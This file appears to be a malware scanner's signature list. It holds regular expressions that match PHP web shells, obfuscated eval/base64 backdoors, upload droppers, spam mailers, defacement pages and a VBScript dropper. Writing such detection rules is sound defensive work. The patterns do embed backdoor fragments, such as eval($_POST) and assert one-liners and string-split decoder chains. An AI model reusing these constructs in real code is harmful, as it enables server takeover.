qr/<\?php\s+\$\{.+?\"\;function\s+http\_get\(\$url\)\{\$\{.+?\]\}\=curl\_init\(\$\{\$\{.+?\]\}\,CURLOPT\_RETURNTRANSFER\,1\)\;\$\{\"G.+?\]\}\,CURLOPT\_FOLLOWLOCATION\,1\)\;curl\_setopt\(\$\{\$\{.+?\"\;return\s+curl\_exec\(\$\{\$\{\"GLO.+?\]\}\)\)\$\_POST\[.+?\"\.\$\_POST\[\"\w\"\]\)\;\s+\?>/is,
qr/<html>\s+<head>\s+<title>Shell\s+Helix\s+Sunda\s+Version.+?BConfig\s+Fucker.+?fclose\s+\(\$dosya\)\;\s+\$([A-z0-9]{1,10})\s+\=\'([A-z0-9]{100,}).+?<\/font>\s+<\/footer>\s+<\/html>/is,
qr/<\?php.+?VARIABLES\s+GOES\s+HERE.+?\$shell\_fake\_name.+?RESOURCES\s+GOES\s+HERE.+?\$icon\s+\=\s+\".+?<\/html>\"\;\s+echo\s+preg\_replace\(\"\/\\s\+\/\"\,\"\s+\"\,\$html\_final\)\;\s+\?>/is,
qr/<html><head>.+?<address>Apache\s+Server\s+at.+?Math\.floor\(Math\.random\(\)\*99999999999\)\;var\s+url\s+\=\s+idc\_glo\_url\+.+?else\s+login\_shell\(\)\;\s+if\(isset\(\$\_GET\[\'file\'\]\).+?return\s+\$buff\;\s+\}\s+\}\s+\?>.+?<\/font>\s+<\/footer>\s+<\/html>/is,
qr/<html>.+?Shell\s+priv\s+\/\/F3KS3C.+?\}\s+elseif\(\$\_GET\[\'do\'\]\s+\=\=\s+\'whois\'\)\s+\{\s+\?>.+?<\/select>\&nbsp\;\s+<\/form>/is,
qr/}\s+\}\s+function\s+login\_shell\(\)\s+\{\s+\?>/is,
qr/<script\s+type\=\"text\/javascript\">.+?<\/script>\s+<\/head>\s+<\?php.+?\.\/Mr\.\s+aQ\..+?function\s+w\_wget\(\$array\)\{.+?mail\(\$idb1\,\s+\"Tetep\s+Ganteng\"\,\s+\$idb3\,\s+\"\[\s+\"\s+\.\s+\$\_SERVER\[\'REMOTE\_ADDR\'\]\s+.\s+\"\s+\]\"\)\;\s+\*\/\s+\?>.+?<\/html>/is,
qr/<\!DOCTYPE.+?Yhuricka<\/title>.+?uid\=0\(root\)\s+gid\=0\(root\)\s+groups\=0\(root\).+?0ut<\/font>\s+<\/div>/is,
qr/<\!DOCTYPE.+?HACKED.+?<\/html>.+?<\!\-\-\s+document\.write\(unescape\(.+?\/\/\-\->\s+<\/script>/is,
qr/<\?php\s+\$auth\_pass\s+\=\s+\".+?\"\;\s+\/\/\s+default\:.+?eval\(base64\_decode\(gzinflate\(str\_rot13\(convert\_uudecode\(gzinflate\(base64\_decode\(\(\$.+?\)\)\)\)\)\)\)\)\;/is,
qr/<html>\s+<head>\s+<title>Shell\s+Login<\/title>.+?<\?php\s+function\s+w\(\$dir\,\$perm\)\s+\{.+?if\(isset\(\$\_POST\[\'phpconfig\'\]\)\)\s+\{\s+\?>/is,
qr/<\?php\s+\/\*\s+\*\s+Ochillroot\s+Shell.+?\@clearstatcache\(\)\;.+?\{\$text\s+\=\s+\$\_POST\[\'code\'\]\;\s+\?>/is,
qr/<html>\s+<\!\-\-\s+Hacked\s+by.+?<\/body>\s+<\/html>/is,
qr/<SCRIPT\s+Language\=VBScript><\!\-\-\s+DropFileName\s+\=\s+\"svchost\.exe\"\s+WriteData\s+\=.+?Set\s+WSHshell\s+\=\s+CreateObject\(\"WScript\.Shell\"\)\s+WSHshell\.Run\s+DropPath\,\s+0\s+\/\/\-\-><\/SCRIPT>/is,
qr/<\?php.+?\$auth\_pass\s+\=\s+\".+?\"\;\s+\/\/\s+default\:.+?eval\(base64\_decode\(gzinflate\(str\_rot13\(convert\_uudecode\(gzinflate\(base64\_decode\(\(\$.+?\)\)\)\)\)\)\)\)\;/is,
qr/<\?php\s+\$\{.+?\"\;if\(get\_magic\_quotes\_gpc\(\)\)\{\$.+?\)\)\;return\$\{\$([A-z0-9]{1,20})\}\;\}\s+\?>/is,
qr/<\?php.+?\@clearstatcache\(\)\;.+?echo\s+\"<center>Copyright\s+\&copy\;.+?\}\s+\?>/is,
qr/<\?php.+?\@clearstatcache\(\)\;.+?function\s+login\_shell\(\)\s+\{.+?if\(\!is\_readable\(\$dir\)\)\s+\{.+?\}\s+\?>\s+<\/html>/is,
qr/<\?php.+?if\(get\_magic\_quotes\_gpc\(\)\)\{.+?foreach\(\$scandir\s+as\s+\$dir\)\{.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+ini\_get\(\'max\_execution\_time\'\)\;.+?\$message\s+\=\s+stripslashes\(\$message\)\;.+?BLACKER\.X\s+<\/p>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$web\s+\=\s+\$\_SERVER\[\"HTTP\_HOST\"\]\;.+?Shell\s+http\:\/\/\$web\$inj.+?IP\:\s+\"\;\s+\}\s+\?>/is,
qr/<\?php.+?\$\{.+?\$\{.+?\$\{.+?\;\$\{\"G.+?\;\$\{\"G.+?\;\$\{\"G.+?\}\)\;\}\}\}\}\}\s+\/\/([A-z0-9]{1,20})\s+\?>/is,
qr/<\?php\s+echo\s+\'<form\s+action\=\"\"\s+method\=\"post\"\s+enctype\=\"multipart\/form\-data\"\s+name\=\"upl\"\s+id\=\"upl\">\'\;echo\s+\'<input\s+type\=\"file\"\s+name\=\"file\"\s+size\=\"50\"><input\s+name\=\"\_upl\"\s+type\=\"submit\"\s+id\=\"\_upl\"\s+value\=\"Upload\"><\/form>\'\;if\(\s+\$\_POST\[\'\_upl\'\]\s+\=\=\s+\"Upload\"\s+\)\s+\{if\(\@copy\(\$\_FILES\[\'file\'\]\[\'tmp\_name\'\]\,\s+\$\_FILES\[\'file\'\]\[\'name\'\]\)\)\{echo\s+\'a\'\;\s+\}else\s+\{echo\s+\'b\'\;\}\}\?>/is,
qr/<\?php\s+header\(\'Content\-Type\:.+?Hacker\s+Shell.+?\)\;break\;default\:home\(\)\;break\;\}\?>/is,
qr/<\?php\s+\@preg\_replace\(\"\/\[pageerror\]\/e\"\,\$\_POST\[.+?\)\;\s+\?><\?php.+?\=urldecode\(.+?create\s+ok\!\"\;\}\}exit\;\'\)\;\$\{.+?\]\(\)\;\?>/is,
qr/<\?php\s+\/\/header\(.+?\=urldecode\(.+?\$start\)\,\(\$\{.+?\]\(\)\;\?>/is,
qr/<\?php\s+if\(\!function\_exists\(.+?\)\+ord\(\$.+?\=strlen\(\$.+?preg\_match\(base64\_decode\(.+?\;\}\}\}\}eval\(.+?\)\)\;\?>/is,
qr/<\?\s+function\s+query\_str\(\$params\)\{.+?BlackSHOP.+?\$numemails\s+\=\s+count\(\$allemails\)\;\s+\$random\_smtp\_string\=array\(.+?eval\(base64\_decode\(\$undetect\)\)\;\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$\w\=base64\_decode\(\'.+?\'\)\.\$\_GET\[\'\w\'\]\.\'\w\'\;\@\$\w\(\$\_POST\[\'\w\'\]\)\;echo\s+\"abc\"\?>/is,
qr/<\?php.+?Akismet3.+?str\_rot13\(gzinflate\(str\_rot13\(base64\_decode\(.+?create\_function\(null\,\s+\$.+?\(\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{20,})\=.+?\"\;\s+eval\(base64\_decode\(gzuncompress\(base64\_decode\(\$([A-z0-9]{20,})\)\)\)\)\;\?>/is,
qr/<\?php\s+\$wp\_load\s+\=\s+\"wp\-load\.php\"\;\s+\$wp\_pluggable\s+\=\s+\"wp\-includes\/pluggable\.php\"\;.+?No\s+posts\s+found<\/error>\"\;\s+\}\s+\}\s+\?><\?php\s+\/\*\s+wp\-code\-inserted\s+\*\/\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzun\'\.\s+\'comp\'\.\s+\'ress\'\;\$.+?\=\s+\'base\'\s+\.\'64\_d\'\s+\.\'ecod\'\s+\.\'e\'\;\$.+?\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$.+?\=\s+array\(\".+?\)\;\s+eval\(\s+\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(E\_ERROR.+?global\s+\$site\_root\_dir\;.+?if\(PLATFORM\s+\=\=\s+WORDPRESS\)\s+\{.+?\/\/print\s+PLATFORM\;\s+\/\/print\_r\(\$all\_dirs\)\;\s+\?>/is,
qr/<\?php\s+\@preg\_replace\(\"\/\/e\"\,\$\_POST\[\'.+?\'\]\,\"Access\s+Denied\"\)\;\?>/is,
qr/<\?php\s+\@eval\(\$\_POST\[\'([A-z0-9]{1,})\'\]\)\;\s+\?>/is,
qr/<\?php.+?if\(isset\(\$\_GET\[\'check\'\]\)\)\{\s+\$file\[\]\s+\=\s+\'id0\.php\'\;.+?curl\_close\(\$ch\)\;\s+\}\s+return\s+\$data\;\s+\}/is,
qr/<\?php\s+\$arrId\s+\=\s+array\(.+?\'([0-9]{1,20})\-([0-9]{1,20})\'\,.+?\)\;\s+\?>/is,
qr/<\?php.+?\$arrnametime\[\]\=.+?\$arr\_word\[.+?\$arr\_key\[\]\=.+?\$strRand\[.+?return\s+\(\$ip\s+\?\s+\$ip\s+\:\s+\$\_SERVER\[\'REMOTE\_ADDR\'\]\)\;\}\s+\/\/file\s+end/is,
qr/<\?php\s+\$\{\"G.+?\(\$\{\$\{\"G\\x\d\wOB\\x\d\dL\\x\d\d\"\}\[.+?\\n\"\;\s+\?>/is,
qr/<\?php\s+echo\s+\'\s+<title>unzip\s+file\s+by\s+ahwak2000.+?\/\/by\s+ahwak2000\s+\?>/is,
qr/<\?php\s+\$\w\=\"ass\"\.\"ert\"\;\s+\$\w\(\$\{\"\_PO\"\.\"ST\"\}\s+\[\'([A-z0-9]{1,})\'\]\)\;\?>/is,
qr/<\?php\s+mb\_http\_input\(.+?\.php\_uname\(\)\..+?Upload\s+Failed\s+\!\!\!.+?while\(\$email\[\$i\]\).+?\$voy\+\+\;\s+\}\s+\?>\s+<\/DIV>\s+<\/div>\s+<\/form>/is,
qr/<\?php.+?\/\/w4l3XzY3\s+wuz\s+here\s+if\(isset\(\$\_POST\[\'action\'\]\s+\)\s+\)\{.+?\?>\s+<\?php\s+if\(isset\(\$\_GET\[\'u\'\]\).+?\.php\_uname\(\)\..+?\}\s+\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+echo\s+\"walex\\n\"\;\s+echo\s+php\_uname\(\)\;\s+\@unlink\(\_\_FILE\_\_\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=.+?\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$.+?\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+([0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+([0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\s+\?>/is,
qr/<\!DOCTYPE.+?Spyus\s+ANH\s+Mailer.+?PRIV8\s+MA\!L3R.+?<\?php\s+\(\@copy\(\$\_FILES\[.+?<\/script>\s+<\/body>\s+<\/html>/is,
qr/<\?php.+?priv8.+?eval\(.+?\}\?>/is,
qr/<\?php\s+if\s+\(\!function\_exists\(.+?\=\s+base64\_decode\(\$.+?preg\_match\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+eval\s+\(\$\_POST\[\d\]\)\;\s+\?>/is,
qr/<\?php\s+\$auth\_pass\s+\=\s+\"\"\;.+?\$default\_action\s+\=\s+base64\_decode\(\'.+?eval\(base64\_decode\(.+?\)\)\;\s+return\;\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\"\w\"\]\)\)\s+\{\$\w\=\"ass\"\.\"ert\"\;\$\w\=\$\w\(\$\_REQUEST\[\"\w\"\]\)\;\}\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\=\s+array\(\'base\'\s+\,\'64\_d\'\s+\,\'ecod\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\(\'g\'\,\s+\'z\'\,\s+\'u\'\,\s+\'n\'\,\s+\'c\'\,\s+\'o\'\,\s+\'m\'\,\s+\'p\'\,\s+\'r\'\,\s+\'e\'\,\s+\'s\'\,\s+\'s\'\)\s+\;\$.+?\)\;\s+eval\s+\(\s+\$.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?\s+error\_reporting\(0\)\;\$\w\=\(isset\(\$\_SERVER\[\"HTTP\_HOST\"\]\)\?\$\_SERVER\[.+?if\(\$\w\=file\_get\_contents\(base64\_decode\(.+?\$\w\=curl\_exec\(\$\w+\)\;curl\_close\(\$\w+\)\;eval\(\$\w\)\;\}\;die\(\)\;\s+\?>/is,
qr/<\?php.+?\$wordpress\_main\_content.+?\$joomla\_main\_content.+?return\s+false\;\s+\}\s+\?>/is,
qr/<\?php.+?zen\.spamhaus\.org.+?implode\(\"\.\"\,\s+array\_reverse\(explode\(\"\.\"\,\s+\$.+?echo\(result\(array\(.+?\?>/is,
qr/<\?php\s+\/\*\s+([A-z0-9]{1,20})\s+\*\/\s+\$eval\=\(\"\?>\"\.gzuncompress\(base64\_decode\(.+?\)\)\)\;\@eval\(\$eval\)\;\s+\?>/is,
qr/\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\s+\=\s+\'decode\'\;\s+\$([A-z0-9]{1,20})\s+\=\s+str\_replace\(.+?\$([A-z0-9]{1,20})\s+\=\s+str\_replace\(.+?function\s+get\_data\_ya\(\$url\)\s+\{.+?function\s+wp\_cd\(.+?unlink\(\"\{\$([A-z0-9]{1,20})\}\.\$([A-z0-9]{1,20})\"\)\;\s+\$([A-z0-9]{1,20})\s+\=\s+\'([A-z0-9]{1,20})\'\;\s+\}/is,
qr/<\?php\s+echo\s+\"Uname\:\"\.system\(\'uname\s+\-a\'\)\;.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(\$([A-z0-9]{1,20})\_\=implode\(\"\"\,\$\_POST\)\)\{\$([A-z0-9]{1,20})\_\=tmpfile\(\)\;fwrite\(\$([A-z0-9]{1,20})\_\,rawurldecode\(\$([A-z0-9]{1,20})\_\)\)\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=stream\_get\_meta\_data\(\$([A-z0-9]{1,20})\_\)\;require\_once\(\$([A-z0-9]{1,20})\[\"uri\"\]\)\;\/\*([A-z0-9]{1,20})\*\/\}else\s+die\(\"error\"\)\;\?>/is,
qr/<\?php.+?b374k.+?\$GLOBALS\[\'pass\'\]\s+\=.+?\$func\=\"cr\"\.\"eat\"\.\"e\_fun\"\.\"cti\"\.\"on\"\;\$b374k\=\$func\(\'\$\w\'\,\'ev\'\.\'al\'\.\'\(\"\?>\"\.gz\'\.\'un\'\.\'com\'\.\'pre\'\.\'ss\(ba\'\.\'se\'\.\'64\'\.\'\_de\'\.\'co\'\.\'de\(\$\w\)\)\)\;\'\)\;\$b374k\(\".+?\)\;\?>/is,
qr/<\?php\s+\$target\_path\=basename\(\$\_FILES\[.+?\]\)\;if\(move\_uploaded\_file\(\$\_FILES\[.+?><input\s+type\=\"submit\"\s+value\=\"Upload\s+File\"\/><\/form>/is,
qr/<\?php\s+\$auth\s+\=.+?function\s+display\_auth\_form\(\)\s+\{.+?auth\(\)\;.+?if\s+\(isset\(\$\_POST\[\'action\'\]\)\).+?default\:\s+return\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\]\;\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\d\]\.\$([A-z0-9]{1,20})\[\d\]\.\$([A-z0-9]{1,20})\[\d\d\].+?\}\s+\}\s+if\s+\(\$([A-z0-9]{1,20})\s+>\=\s+\$([A-z0-9]{1,20})\)\s+\{\s+\$([A-z0-9]{1,20})\s+\+\=\s+1\;\s+\}\s+return\s+\$([A-z0-9]{1,20})\;\s+\}/is,
qr/<\?php.+?eval\(\"\\\$\w\=gzin\"\.\"flate\(base\"\.\"64\_de\"\.\"code\(\\\".+?\\\"\)\)\;\"\)\;eval\(\"\?>\"\.\$\w\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzu\'\.\s+\'nco\'\.\s+\'mpr\'\.\s+\'ess\'\;\$.+?\=\s+\'b\'\s+\.\'a\'\s+\.\'s\'\s+\.\'e\'\s+\.\'6\'\s+\.\'4\'\s+\.\'\_\'\s+\.\'d\'\s+\.\'e\'\s+\.\'c\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$.+?\=\s+\'im\'\s+\.\'pl\'\s+\.\'od\'\s+\.\'e\'\;\$.+?\=\s+array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\=\'\'\;\@eval\(base64\_decode\(.+?\)\)\;\/\*\,\*\//is,
qr/<\?php\s+preg\_replace\(\"\\x.+?\\x3B\"\,\"\"\)\;\s+\?>/is,
qr/<\?php.+?WordPress\s+Options\s+Header.+?eval\(gzinflate\(base64\_decode\(rawurldecode\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$extraneous\=base64\_decode\(.+?\)\;\s+eval\(\"return\s+eval\(\\\"\$extraneous\\\"\)\;\"\)\s+\?>/is,
qr/<\?php\s+header\(\'Location\:\s+http\:\/\/.+?\/\'\)\;exit\;\s+\?>/is,
qr/<\?php\s+\$code\=base64\_decode\(.+?\)\;\s+eval\(\"return\s+eval\(\\\"\$code\\\"\)\;\"\)\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=.+?\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$.+?\$([A-z0-9]{1,20})\s+\=\s+false\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{1,20})\"\;\$([A-z0-9]{1,20})\s+\=\s+false\;\$.+?\$([A-z0-9]{1,20})\s+\=\s+([0-9]{1,20})\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$([A-z0-9]{1,20})\s+\=\s+\"\"\;\$.+?\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+true\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{20,})\"\;\$([A-z0-9]{1,20})\s+\=\s+\"([A-z0-9]{1,20})\"\;\s+\?>/is,
qr/<\?php\s+\/\*versio\:\d\.\d\d\*\/\s+\$GLOBALS\[\"yfegmf\"\]\=\".+?\$GLOBALS\[\'yfegmf\'\]\;\$.+?\)\)\;\}\;eval\(.+?\)\)\;\}\;\?>/is,
qr/<\?php.+?if\(isset\(\$\_REQUEST\[.+?\]\;\s+eval\(\$.+?\)\;\s+exit\(0\)\;\s+\}\s+if\(isset\(\$\_REQUEST\[.+?\=\s+fwrite\(\$.+?\)\;\s+echo\s+\$([A-z0-9]{1,20})\;\s+exit\(\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[.+?\=\s+stripslashes\(base64\_decode\(\$\_POST\[.+?\=\s+stripslashes\(base64\_decode\(\$\_POST\[.+?\=\s+mail\(stripslashes\(\$.+?if\(\$([A-z0-9]{1,20})\)\{echo\s+\'([A-z0-9]{1,20})\'\;\}\s+else\s+\{echo\s+\'([A-z0-9]{1,20})\s+\:\s+\'\s+\.\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+\/\/([A-z0-9]{100,}).+?eval\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+error\_reporting\(0\)\;.+?\$hash\s+\=.+?\$search\s+\=\s+\'\'\;\s+\$wp\_file\_descriptions\s+\=\s+array\(.+?\/\/\s+Deprecated\s+files\s+\'md5\_check\.php\'\s+\=>.+?\$wp\_template\s+\=\s+\@preg\_replace\(.+?\]\)\;\s+\?>/is,
qr/<\?php.+?function\s+pre\_term\_name\(\s+\$wp\_kses\_data\,\s+\$wp\_nonce\s+\)\s+\{.+?\$wp\_default\_logo\s+\=.+?echo\s+\$wp\_auth\_check\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=.+?\$([A-z0-9]{1,20})\s+\=\s+\$([A-z0-9]{1,20})\(\'\'\,\s+\'.+?\)\;\s+\$([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+if\s+\(\$\_REQUEST\[.+?\$in\_data\s+\=\s+base64\_decode\(\$\_REQUEST\[\'query\'\]\)\;.+?\{echo\s+\'bad\s+request\'\;\}.+?\}\s+else\s+\{echo\s+\'not\s+found\'\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;.+?\=\s+stripslashes\(base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\)\;.+?\}\s+else\s+\{echo\s+\'([A-z0-9]{1,20})\s+\:\s+\'\s+\.\s+\$([A-z0-9]{1,20})\;\}/is,
qr/<\?php\s+header\(\"HTTP\/1\.0\s+404\s+Not\s+Found\"\)\;.+?if\(\!empty\(\$\_REQUEST\[\$.+?\=\"ass\"\.\/\*\;\$\w\=\*\/\"ert\"\;\@\$\w\(stripslashes\(\$\_REQUEST\[\$.+?\]\)\)\;\}else\@unlink\(\_\_FILE\_\_\)\;.+?\/\/([A-z0-9]{5,})\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'st\'\.\'rr\'\.\'ev\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\(\'eta\'\.\'lfn\'\.\'izg\'\)\;eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$.+?\(\'\'\,\$([A-z0-9]{1,20})\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'gzu\'\.\s+\'nco\'\.\s+\'mpr\'\.\s+\'ess\'\;\$([A-z0-9]{1,20})\s+\=\s+\'b\'\s+\.\'a\'\s+\.\'s\'\s+\.\'e\'\s+\.\'6\'\s+\.\'4\'\s+\.\'\_\'\s+\.\'d\'\s+\.\'e\'\s+\.\'c\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$.+?\=\s+array\(.+?\)\;\s+eval\(\s+\$([A-z0-9]{1,20})\s+\(\$([A-z0-9]{1,20})\s+\(\$([A-z0-9]{1,20})\s+\(\'\'\,\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'gzu\'\.\s+\'nco\'\.\s+\'mpr\'\.\s+\'ess\'\;\$([A-z0-9]{1,20})\s+\=\s+\'ba\'\s+\.\'se\'\s+\.\'64\'\s+\.\'\_d\'\s+\.\'ec\'\s+\.\'od\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+\'imp\'\s+\.\'lod\'\s+\.\'e\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\)\;\s+eval\(\s+\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$.+?\=\s+\'s\'\.chr\(.+?\)\.\'rrev\'\;\$.+?\=\s+array\(.+?\(\'e\'\.\'t\'\.\'a\'\.\'l\'\.\'f\'\.\'n\'\.\'i\'\.\'z\'\.\'g\'\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+array\(.+?array\(\'base\'\s+\,\'64\_d\'\s+\,\'ecod\'\s+\,\'e\'\)\;\s+\$.+?\=\s+array\(\'gzun\'\,\s+\'comp\'\,\s+\'ress\'\)\s+\;\$.+?eval\s+\(\s+\$.+?\)\s+\)\s+\)\s+\)\s+\;\s+\?>/is,
qr/<\?php\s+\$.+?\)\.\'rev\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\(\'edo\'\.\'lpm\'\.\'i\'\)\;\$.+?\(\'eta\'\.\'lfn\'\.\'izg\'\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'st\'\.\'rr\'\.\'ev\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\(\'edo\'\.\'ced\'\.\'\_46\'\.\'esa\'\.\'b\'\)\;\$.+?\(\'edo\'\.\'lpm\'\.\'i\'\)\;\$.+?\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+function\s+inject\_gtm\(\$file\,\s+\&\$arr\).+?\$script\s+\=\s+\'\$\{.+?<<\/DEL\_FAIL>>\"\;\s+\}/is,
qr/<\?php\s+\$\{\"\\x.+?\;\$\{\"GLOB\\x.+?\)\;\$\{\$\{.+?ALS\"\}\[\".+?\@\$\{\$([A-z0-9]{1,20})\}\(\$\_POST\[\"\w\"\]\)\;echo.+?\;\?>/is,
qr/<\?php\s+echo.+?\.php\_uname\(\)\..+?Upload.+?Upload.+?Upload.+?\}\s+\}\s+\?>/is,
qr/<\?php\s+\$.+?\'gz\'\.\s+\'un\'\.\s+\'co\'\.\s+\'mp\'\.\s+\'re\'\.\s+\'ss\'.+?\'bas\'\s+\.\'e64\'\s+\.\'\_de\'\s+\.\'cod\'\s+\.\'e\'.+?\'i\'\s+\.\'m\'\s+\.\'p\'\s+\.\'l\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'.+?array\(.+?eval\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'s\'\.\'t\'\.\'r\'\.\'r\'\.\'e\'\.\'v\'\;\$([A-z0-9]{1,20})\s+\=\s+array\(.+?\(\'et\'\.\'al\'\.\'fn\'\.\'iz\'\.\'g\'\)\;eval\(\$.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php\s+eval\(\"\\n\\\$([A-z0-9]{1,20})\s+\=\s+intval\(\_\_LINE\_\_\)\s+\*\s+337\;\"\)\;.+?eval\s+\(gzinflate\(base64\_decode\(\$\w\)\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\$\_POST\[\'([A-z0-9]{1,20})\'\]\;if\(\$([A-z0-9]{1,20})\!\=\'\'\)\{\$([A-z0-9]{1,20})\=base64\_decode\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\@eval\(\"\\\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\;\"\)\;\}/is,
qr/<\?php\s+if\s+\(isset\(\$\_POST\[.+?\$email\s+\=\s+\@base64\_decode\(.+?return\s+jk\_\_\_\(\$url\)\;\s+\}\s+\}\s+\}/is,
qr/<\?php\s+\/\*Details.+?\$auth\_pass\s+\=.+?\$\_\_\=s\(base64\_decode\(.+?\$\_\=create\_function\(\"\"\,\@gzuncompress\(\$\_\_\)\)\;\$\_\(\)\;\?>/is,
qr/eval\(str\_rot13\(\'([A-z0-9]{1,20})\s+([A-z0-9]{1,20})\_([A-z0-9]{1,20})\(\)\{\$\w\=.+?\$\w\=([A-z0-9]{1,20})\(\_\_([A-z0-9]{1,20})\_\_\)\..+?\}\}([A-z0-9]{1,20})\_([A-z0-9]{1,20})\(\)\;\'\)\)\;/is,
qr/<html>\s+<head>\s+<title>Local\s+DOMAIN\:USER\s+Show\s+\|\s+by\s+\[\s+Lagripe\-Dz\s+\]<\/title>.+?\@implode\(\@file\(\"\/etc\/named\.conf\"\)\)\;.+?<\/body>\s+\<\/html>/is,
qr/<\?php.+?\'gz\'\.\s+\'un\'\.\s+\'co\'\.\s+\'mp\'\.\s+\'re\'\.\s+\'ss\'.+?\'base\'\s+\.\'64\_d\'\s+\.\'ecod\'\s+\.\'e\'.+?\'i\'\s+\.\'m\'\s+\.\'p\'\s+\.\'l\'\s+\.\'o\'\s+\.\'d\'\s+\.\'e\'.+?array\(.+?eval.+?\?>/is,
qr/<\?php\s+\$auth\_pass.+?Shell.+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+\$pass\s+\=.+?Blackwave\s+Mass\s+Defacer.+?Contact\s+Me<\/font>/is,
qr/<\?php.+?PHP\s+Encoder\s+priv8.+?set\_time\_limit\(0\)\;error\_reporting\(0\)\;preg\_replace\(\"\\x.+?\)\;\s+\?>/is,
qr/<\?php\s+\$color\s+\=\s+\"\#df5\"\;.+?FilesMan.+?Found\'\)\;\s+exit\;/is,
